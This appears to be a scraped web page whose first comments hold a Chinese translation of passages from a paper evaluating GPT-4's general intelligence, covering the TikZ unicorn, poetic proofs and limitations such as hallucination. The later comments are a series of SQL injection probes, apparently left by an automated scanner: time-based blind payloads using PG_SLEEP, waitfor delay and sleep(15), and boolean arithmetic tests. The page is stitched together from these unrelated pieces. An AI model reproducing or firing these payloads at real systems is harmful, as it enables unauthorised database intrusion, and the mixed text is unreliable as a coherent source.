1. 1

    为了说明我们评估 GPT-4 智能的方法,让我们考虑图 1.1 中与 GPT-4 的前两个示例互动。第一个示例是要求 GPT-4 以诗歌的形式写一个关于质数无穷性的证明。这是一个具有挑战性的任务,需要结合基本的数学推理、诗意表达和自然语言生成。第二个示例是要求 GPT-4 用 TiKZ 画一只独角兽。这是另一个具有挑战性的任务,需要结合视觉想象力和编码技巧。在这两种情况下,GPT-4 产生的令人印象深刻的输出远优于之前的最先进的 LLM ChatGPT,并且至少与人类的表现相当(如果不是更优越的话)。

    然而,令人印象深刻的输出还不足以使我们相信 GPT-4 真正掌握了这些任务。我们需要进一步探测,以排除 GPT-4 只是在记忆或复制一些现有数据的可能性。对于诗歌,我们可以稍微改变问题,要求 GPT-4 以莎士比亚的风格写一个相同定理的证明,参见图 2.2,或者要求一个不同的组合,例如写一个关于语言模型的柏拉图式对话,参见图 1.6。可以看出,GPT-4 能够轻松地适应不同的风格并产生令人印象深刻的输出,表明它对涉及的概念具有灵活而通用的理解。对于独角兽,我们可以稍微修改代码,要求 GPT-4 修复或改进它。例如,我们可以去掉角,对坐标进行一些随机变换,然后要求 GPT-4 将角重新添加到独角兽(我们还仔细删除了代码中的任何文本信息,例如注释)。如图 1.4 所示,GPT-4 可以正确识别头部位置,画出角,并将其附加到头部,表明它可以理解和操作代码,以及根据自然语言描述推断和生成视觉特征。

    这些示例展示了我们如何利用人类的创造力和好奇心产生新颖且困难的问题,并探测 GPT-4 的回应和行为,以评估其智能。在本文的其余部分,我们围绕用例组织对 GPT-4 的研究,涵盖各种领域和任务,强调 GPT-4 的优点和缺点。

    1. 1
      我们研究 GPT-4 智能的方法

      如何衡量在未知但极其庞大的网络文本数据上训练的大型语言模型的智能呢?机器学习的标准方法是在一组标准基准数据集上评估系统,确保它们独立于训练数据,并覆盖一系列任务和领域。这种方法旨在将真正的学习与纯粹的记忆分开,并得到了丰富的理论框架的支持[SSBD14, MRT18]。然而,这种方法不一定适用于研究 GPT-4,原因有两个。首先,由于我们无法获得其庞大训练数据的全部细节,我们必须假设它可能已经看到了每个现有的基准,或者至少看到了一些类似的数据。例如,GPT-4 似乎了解最近提出的 BIG-bench [SRR+22](至少 GPT-4 知道来自 BIG-bench 的金丝雀 GUID)。当然,OpenAI 本身可以访问所有训练细节,因此他们的报告[Ope23]包含了许多详细的基准测试结果。尽管如此,第二个原因使我们超越传统基准可能更为重要:GPT-4 智能的关键方面之一是其通用性,似乎能够理解和联系任何主题,并执行超出狭义 AI 系统典型范围的任务。GPT-4 在一些无法找到单一解决方案的任务上的表现最为出色,如编写图形用户界面(GUI)或帮助人们就某个工作相关问题进行头脑风暴。这样的生成性或交互性任务的基准也可以设计,但评估指标成为挑战(例如,参见[PSZ+21]关于 NLP 中这一积极研究领域的一些最近进展)。我们注意到,关于衡量 AI 系统的标准方法也在[Cho19]中受到批评,在那里提出了一个新的基准来评估通用智能。我们没有在后者基准上测试 GPT-4,原因是前面提到的,以及这个基准的视觉性质,因此更适合在[Ope23]中描述的 GPT-4 的多模态版本。

      为了克服上述限制,我们在这里提出了一种不同的研究 GPT-4 的方法,它更接近传统心理学而非机器学习,利用人类的创造力和好奇心。我们的目标是生成新颖且困难的任务和问题,有力地证明 GPT-4 远远超越了记忆,并且对概念、技能和领域具有深入且灵活的理解(类似的方法也在[CWF+22]中提出)。我们还旨在探测 GPT-4 的回应和行为,以验证其一致性、连贯性和正确性,并揭示其局限性和偏见。我们承认这种方法在某种程度上是主观和非正式的,可能无法满足严格的科学评估标准。然而,我们相信这是欣赏 GPT-4 卓越能力和挑战的有益且必要的第一步,这样的第一步为开发更正式和全面的测试和分析具有更通用智能的 AI 系统的方法创造了新的机会

      1. 1

        我们声称 GPT-4 代表了朝着 AGI 的进步,并不意味着它在所做的事情上是完美的,或者它接近能够做到任何人类可以做的事情(这是 AGI 的通常定义之一;在结论部分有关于此的更多讨论),或者它具有内在的动机和目标(这是某些 AGI 定义中的另一个关键方面)。实际上,即使在 1994 年智力定义的有限背景下,我们也不完全清楚 GPT-4 在某些智力轴线上能走多远,例如规划(见第 8 节),而且可以说它完全缺少“迅速学习和从经验中学习”的部分,因为该模型不是持续更新的(尽管它可以在一个会话中学习,例如参见第 5 节)。总的来说,GPT-4 仍然有许多局限性和偏见,我们将在下文详细讨论这些问题,并在 OpenAI 的报告 Ope23 中予以解释。尤其是它仍然受到 LLMs 的一些众所周知的缺点的困扰,例如幻觉问题(参见图 1.8)或基本算术错误(参见附录 D),然而,它还克服了一些基本障碍,例如获取许多非语言能力(例如,它解决了(MIB +23)描述的 LIM 失败模式中的大部分问题,同时在常识方面也取得了很大进展,参见图 1.7 作为第一个例子,附录 A 提供了更多信息)。这突显出,虽然 GPT-4 在许多任务上达到或超越人类水平,但整体上,它的智力模式显然并非类似人类。然而,GPT-4 几乎可以肯定只是通往一系列越来越通用智能系统的第一步,事实上,在我们测试 GPT-4 的过程中,GPT-4 本身已经得到了改进,见图 1.3,展示了在一个月的训练过程中独角兽绘图的演变。然而,即使作为第一步,GPT-4 也挑战了关于机器智能的许多广泛认同的假设,并展示了源自于和机制难以精确辨识的新兴行为和能力(关于此的更多讨论请参见结论部分)。我们撰写这篇论文的主要目的是分享我们对 GPT-4 能力和局限性的探索

        1. 1

          -5 OR 928=(SELECT 928 FROM PG_SLEEP(15))–

          1. 1

            gr3JYp9Q’; waitfor delay ‘0:0:15’ –

            1. 1

              1 waitfor delay ‘0:0:15’ –

              1. 1

                -1); waitfor delay ‘0:0:15’ –

                1. 1

                  -1; waitfor delay ‘0:0:15’ –

                  1. 1

                    (select(0)from(select(sleep(15)))v)/’+(select(0)from(select(sleep(15)))v)+’”+(select(0)from(select(sleep(15)))v)+”/

                    1. 1

                      0”XOR(if(now()=sysdate(),sleep(15),0))XOR”Z

                      1. 1

                        0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z

                        1. 1

                          if(now()=sysdate(),sleep(15),0)

                          1. 1

                            -1” OR 3+501-501-1=0+0+0+1 –

                            1. 1

                              -1” OR 2+501-501-1=0+0+0+1 –

                              1. 1

                                -1’ OR 3+33-33-1=0+0+0+1 or ‘OZ37exDQ’=’

                                1. 1

                                  -1’ OR 2+33-33-1=0+0+0+1 or ‘OZ37exDQ’=’

                                  1. 1

                                    -1’ OR 3+118-118-1=0+0+0+1 –

                                    1. 1

                                      -1’ OR 2+118-118-1=0+0+0+1 –

                                      1. 1

                                        -1 OR 3+328-328-1=0+0+0+1